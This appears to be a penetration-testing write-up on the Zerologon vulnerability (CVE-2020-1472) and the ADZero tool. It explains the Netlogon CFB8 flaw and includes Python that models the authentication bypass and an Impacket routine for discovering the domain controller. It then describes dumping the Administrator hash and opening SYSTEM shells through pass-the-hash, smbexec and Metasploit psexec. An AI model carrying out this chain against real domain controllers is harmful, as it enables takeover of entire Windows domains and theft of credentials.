
In August 2020, Microsoft released a patch for a security vulnerability with the code CVE-2020-1472, which directly affects the Domain Controller machine in an Active Directory environment. The vulnerability, named Zerologon, was given a CVSS score of 10 out of 10. An attacker exploiting the Zerologon vulnerability can access the Domain Controller machine without authentication, obtain elevated privileges, and carry out critical operations.
The Zerologon vulnerability stems from a cryptographic flaw in the Netlogon protocol. Netlogon computes its credentials with AES in CFB8 mode using an initialisation vector consisting entirely of null bytes. With that IV, encrypting a plaintext consisting of null bytes produces a ciphertext that also consists of null bytes for 1 in every 256 randomly generated keys, so an attacker who does not know the key can still present a valid credential by trying repeatedly. This flawed credential computation is exactly what the Netlogon protocol relies on as its authentication mechanism.
The Netlogon Remote Protocol (MS-NRPC) is used in Active Directory environments for workstations and servers to communicate with the Domain Controller machine over a secure channel. Every workstation or server that has joined Active Directory has a computer account, and the password of that account is known to the machine itself and to the Domain Controller. Active Directory derives several keys from the same password, which are used in authentication protocols such as Kerberos and NTLM.
The Zerologon attack first bypasses Netlogon authentication by repeatedly sending an all-zero client challenge together with an all-zero client credential until the Domain Controller accepts them, which takes about 256 attempts on average. It then calls the Netlogon password-change function (NetrServerPasswordSet2) with an all-zero encrypted password blob, which sets the password of the Domain Controller's own computer account in Active Directory to an empty string; from that point on the Domain Controller verifies the reset computer account credentials as valid.
Authenticating with the reset computer account gives the attacker elevated privileges, because a Domain Controller's computer account is permitted to use the DRSUAPI protocol to synchronise Active Directory data, including NT hash values and Kerberos keys (the DCSync technique). Once NT hash values and Kerberos keys are obtained, the attacker can impersonate any user in the domain or create forged Kerberos tickets.
When the Domain Controller computer account password has been reset in Active Directory and the Domain Controller is then restarted, various services will fail to start when they try to read information from Active Directory, and the Domain Controller loses its own secure channel and replication. This is because the computer account password stored in the Domain Controller's registry (the LSA secret $MACHINE.ACC) and in the memory of lsass.exe has not been changed and no longer matches the value in Active Directory. To prevent this from occurring during penetration tests, after a Domain Controller containing the Zerologon vulnerability has been compromised, the password of the computer account that was reset in Active Directory must be restored to its original value. The original value can be read from the Domain Controller's LSA secrets (secretsdump.py lists it as $MACHINE.ACC when run with the Administrator hash obtained via DCSync) and written back with the same Netlogon password-change call; afterwards, check that the Domain Controller still replicates and that no Netlogon or Kerberos errors appear in its event log.
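The following block is an added example and is not code from the ADZero tool or from the published Zerologon exploit. It models the CFB8 weakness described above and the authentication bypass built on it: a generic CFB8 routine, the 1-in-256 rate of all-zero credentials over random keys, a minimal stand-in for the Domain Controller side of NetrServerReqChallenge/NetrServerAuthenticate3, and the reason an all-zero password blob is accepted once the bypass succeeds. The block cipher (toy_block_encrypt), the session-key KDF inside NetlogonServer and the machine-account secret are this example's own assumptions, chosen so it runs with the standard library only; the all-zero property comes from the CFB8 mode and the zero IV, not from the cipher, so it holds for real AES-CFB8 in the same way.

```python
"""Added example (not ADZero or the public exploit): CFB8 zero-IV weakness and the
Zerologon authentication bypass, modelled with a stand-in block cipher."""
import hashlib
import random

BLOCK = 16           # AES block size; CFB8 still advances one byte per step
ZERO_IV = bytes(BLOCK)


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in keyed block function (assumption: NOT AES, just a 16-byte PRF)."""
    assert len(block) == BLOCK
    return hashlib.sha256(b"block" + key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: C[i] = P[i] XOR E_k(register)[0]; the register then shifts C[i] in."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ toy_block_encrypt(key, bytes(register))[0]
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def netlogon_credential(session_key: bytes, data: bytes) -> bytes:
    """ComputeNetlogonCredential, AES case: CFB8 with an all-zero IV.
    With IV = 0 and P = 0, C[0] = E_k(0)[0]; if that byte is 0x00 the register
    stays all-zero and every later output byte is 0x00 as well, for any length."""
    return cfb8_encrypt(session_key, ZERO_IV, data)


def zero_key(session_key: bytes) -> bool:
    """True for the 1-in-256 keys whose zero-block encryption starts with 0x00."""
    return toy_block_encrypt(session_key, bytes(BLOCK))[0] == 0


def zero_credential_rate(trials: int, seed: int = 0) -> float:
    """Fraction of random session keys that turn an 8-byte zero challenge into an
    8-byte zero credential; expected about 1/256 = 0.0039."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        key = bytes(rng.getrandbits(8) for _ in range(BLOCK))
        hits += netlogon_credential(key, bytes(8)) == bytes(8)
    return hits / trials


def first_byte_rule_holds(trials: int, seed: int = 2) -> bool:
    """Checks the equivalence: all-zero credential <=> zero_key(), over random keys."""
    rng = random.Random(seed)
    for _ in range(trials):
        key = bytes(rng.getrandbits(8) for _ in range(BLOCK))
        if zero_key(key) != (netlogon_credential(key, bytes(8)) == bytes(8)):
            return False
    return True


class NetlogonServer:
    """Minimal model of the DC side of NetrServerReqChallenge / NetrServerAuthenticate3.
    The session-key derivation is a hash stand-in (assumption) for the MS-NRPC KDF
    over the machine-account secret and both challenges."""

    def __init__(self, machine_secret: bytes, seed: int = 1):
        self.secret = machine_secret            # constructed secret, unknown to the attacker
        self.rng = random.Random(seed)          # seeded so the run is reproducible
        self.session_key = None
        self.client_challenge = None

    def req_challenge(self, client_challenge: bytes) -> bytes:
        server_challenge = bytes(self.rng.getrandbits(8) for _ in range(8))
        self.client_challenge = client_challenge
        self.session_key = hashlib.sha256(
            self.secret + client_challenge + server_challenge).digest()[:BLOCK]
        return server_challenge

    def authenticate(self, client_credential: bytes) -> bool:
        return client_credential == netlogon_credential(self.session_key, self.client_challenge)


def zerologon_bypass(server: NetlogonServer, max_attempts: int = 4000):
    """The attacker knows neither the secret nor the session key. An all-zero
    challenge plus an all-zero credential is accepted whenever the fresh session
    key is a zero_key(), i.e. with probability 1/256 per attempt."""
    zero8 = bytes(8)
    for attempt in range(1, max_attempts + 1):
        server.req_challenge(zero8)
        if server.authenticate(zero8):
            return attempt
    return None


def zero_password_blob_accepted(server: NetlogonServer) -> bool:
    """After the bypass the same session key protects NetrServerPasswordSet2. Under a
    zero_key(), CFB8 maps all-zero bytes to all-zero bytes in both directions, so an
    all-zero 516-byte encrypted password blob decrypts to a structure whose length
    field is 0: an empty password. The same property makes a zero authenticator valid."""
    blob = bytes(516)
    return netlogon_credential(server.session_key, blob) == blob


if __name__ == "__main__":
    print("zero-credential rate over 20000 random keys:", zero_credential_rate(20000))
    dc = NetlogonServer(machine_secret=b"constructed-machine-account-secret")
    n = zerologon_bypass(dc)
    print("accepted after", n, "attempts; zero password blob valid:",
          zero_password_blob_accepted(dc))
```

The design point the model makes visible is that the retry loop and the empty password are the same defect: the session key the attacker lands on is one for which encryption of any run of null bytes is null bytes, which is why the authenticator and the password blob can both be sent as zeros without knowing the key.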
The exploit module published for the Zerologon vulnerability (CVE-2020-1472) was optimised by the Privia Security team into a tool named ADZero. The ADZero tool obtains a shell session with NT AUTHORITY\SYSTEM privileges on a Domain Controller machine containing the Zerologon vulnerability. Figure 1 shows the usage instructions for the ADZero tool.

Figure 1 shows that the ADZero tool requires only the IP address of the Domain Controller machine, whereas the published Zerologon exploit module asks the user for the IP address, the DC name, and the DC computer account.
The ADZero tool sends an SMB login request to the Domain Controller machine using the IP address it is given. The code for the SMB login request is shown in Figure 2.

As Figure 2 shows, the Domain Controller machine name and domain name are taken from the response to the SMB login request. The exploit module is then run with the Domain Controller machine name, the IP address, and the DC computer account, which is formed by appending a '$' to the DC machine name.
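The block below is an added example of the lookup described above and is not the ADZero source. It derives the DC host name, domain and DC computer account from a single SMB session-setup attempt using Impacket's SMBConnection; the null-session approach, the function names and the NetBIOS name check are this example's own assumptions about how such a lookup is done, not a description of ADZero's code.

```python
"""Added example (not ADZero code): derive DC name, domain and the DC$ account
from one SMB login attempt. discover_dc() needs network access and Impacket."""
import re


def computer_account_name(server_name: str) -> str:
    """Machine accounts are the NetBIOS host name plus '$' (DC01 -> DC01$).
    Assumption: the name is upper-cased, truncated at the first dot and checked
    against the 15-character NetBIOS limit before the '$' is appended."""
    name = server_name.strip().split(".")[0].upper()
    if not re.fullmatch(r"[A-Z0-9\-]{1,15}", name):
        raise ValueError(f"not a valid NetBIOS host name: {server_name!r}")
    return name + "$"


def discover_dc(ip: str, port: int = 445) -> dict:
    """Negotiate SMB with the target and attempt an anonymous (null) session.
    Even when the DC rejects the login, the NTLM CHALLENGE it sent first carries
    the server's NetBIOS name and domain, which Impacket keeps on the connection."""
    from impacket.smbconnection import SMBConnection  # lazy import: network path only
    conn = SMBConnection(ip, ip, sess_port=port)
    try:
        conn.login("", "")
    except Exception:
        pass  # STATUS_ACCESS_DENIED / LOGON_FAILURE is expected; target info was received
    info = {
        "dc_name": conn.getServerName(),
        "domain": conn.getServerDomain(),
        "dns_domain": conn.getServerDNSDomainName(),
    }
    conn.close()
    info["dc_account"] = computer_account_name(info["dc_name"])
    return info


if __name__ == "__main__":
    import sys
    # usage: python discover.py <DC_IP>   (assumed file name)
    print(discover_dc(sys.argv[1]))
```

The resulting dc_name, dc_account and ip are the three values the original exploit module asks for, which is why a single IP address is enough input.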
In Figure 3, the ADZero tool has been run against the IP address 172.16.5.105.

Figure 3 shows that the Zerologon attack against IP address 172.16.5.105 was carried out successfully. As a result, the Domain Controller computer account password is set to an empty string (NT hash of the empty string: 31d6cfe0d16ae931b73c59d7e0c089c0).
After the Domain Controller computer account password has been set to an empty string, the secretsdump.py module from Impacket is used, authenticating as the DC computer account with the empty password, to dump the Administrator user's LM:NTLM hash to a file named out. The smbexec.py module from Impacket is then used to obtain a shell on the Domain Controller machine with the Administrator user's LM:NTLM hash. The technique of obtaining a session on the target machine with LM:NTLM hash information instead of a password is called Pass-the-Hash. Figure 4 shows the shell session.

Figure 4 shows that the shell session was obtained with NT AUTHORITY\SYSTEM privileges.
In addition, a Meterpreter session can be obtained with the LM:NTLM hash value in the out file produced by the ADZero tool.
In Figure 5, the contents of the out file have been displayed using the cat command.

Figure 5 shows the LM:NTLM hash information belonging to the Administrator user contained in the out file. The psexec exploit module within the Metasploit Framework tool can be used to obtain a Meterpreter session on the Domain Controller machine.
Figure 6 shows the use of the psexec module.

Figure 6 shows the obtained LM:NTLM hash being supplied to the exploit/windows/smb/psexec module of the Metasploit Framework. Running the module yields a Meterpreter session.
Figure 7 shows the exploit module being run and the Meterpreter session being obtained.

Figure 7 shows that the Meterpreter session was obtained with NT AUTHORITY\SYSTEM privileges.
ADZero – Zerologon Exploit Tool: https://github.com/Privia-Security/ADZero